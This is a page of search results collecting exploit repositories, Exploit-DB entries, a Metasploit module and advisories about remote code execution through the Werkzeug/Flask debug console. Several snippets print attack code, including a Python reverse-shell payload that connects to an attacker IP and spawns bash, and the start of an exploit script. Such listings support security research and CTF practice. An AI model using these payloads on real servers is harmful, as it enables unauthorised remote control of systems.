GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
python exploit for werkzeug debug shell command execution - Fare9/PyWerkzeug-Debug-Command-Execution
Starred by 10 users
Forked by 8 users
Languages Python
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
payload = '''import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0);'''\
· '''os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close();'''%(attackerIP,port)
Author MistSpark
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
In this case, we are taking the exploit script a step further and we are relying on subprocess to reuse the HTTP request made through by using curl. Doing this, helps in dynamically getting the victim server information remotely and without relying on python's urllib to make these HTTP requests. Once you find out Werkzeug Console is pin-protected, you need to find a way to get this pin and access the debug console, right?
Author grav3m1nd-byte
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
print(success_message('Werkzeug console successfully found!')) · if 'SECRET' not in resp.text: print(error_message('Secret key not found!')) sys.exit(1) secret = re.findall("SECRET = \"([^']{20})", resp.text)[0] print(info_message('Secret Code: {}\n'.format(secret))) ·
Author am0nsec
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-bypass
Starred by 64 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
GitHub
github.com › topics › werkzeug-exploit
werkzeug-exploit · GitHub Topics · GitHub
WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
GitHub
github.com › magma2 › exploit › blob › master › werkzeug.py
exploit/werkzeug.py at master · magma2/exploit
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
·
· if len(sys.argv) != 5:
· print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
· sys.exit(-1)
·
·
· response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
·
· if "Werkzeug " not in response.text:
·
Author magma2
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
However, if the HTTP connection ... GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode....
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.
Author rapid7
Veracode
sourceclear.com › vulnerability-database › security › directory-traversal › python › sid-20917
Directory Traversal Vulnerability in the werkzeug library
We cannot provide a description for this page right now
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
Snyk
snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 0.16.1 vulnerabilities
Security vulnerabilities and package health score for pip package Werkzeug 0.16.1
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
It may be necessary to set this ... before the request is passed to the application. Determines which algorithm the exploit module will use to generate a pin and cookie....
Author rapid7
Veracode
sca.analysiscenter.veracode.com › vulnerability-database › security › open-redirection › python › sid-27924
Veracode
We cannot provide a description for this page right now
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TAR
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution › blob › master › exploit_werkzeug.py
PyWerkzeug-Debug-Command-Execution/exploit_werkzeug.py at master · Fare9/PyWerkzeug-Debug-Command-Execution
python exploit for werkzeug debug shell command execution - Fare9/PyWerkzeug-Debug-Command-Execution
Author Fare9
GitHub
github.com › advisories › GHSA-2g68-c3qc-8985
Werkzeug debugger vulnerable to remote execution when interacting with attacker controlled domain · CVE-2024-34069 · GitHub Advisory Database · GitHub
May 5, 2024 - The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances.
Veracode
sourceclear.com › vulnerability-database › security › open-redirection › python › sid-27924
Open Redirection Vulnerability in the Werkzeug library
We cannot provide a description for this page right now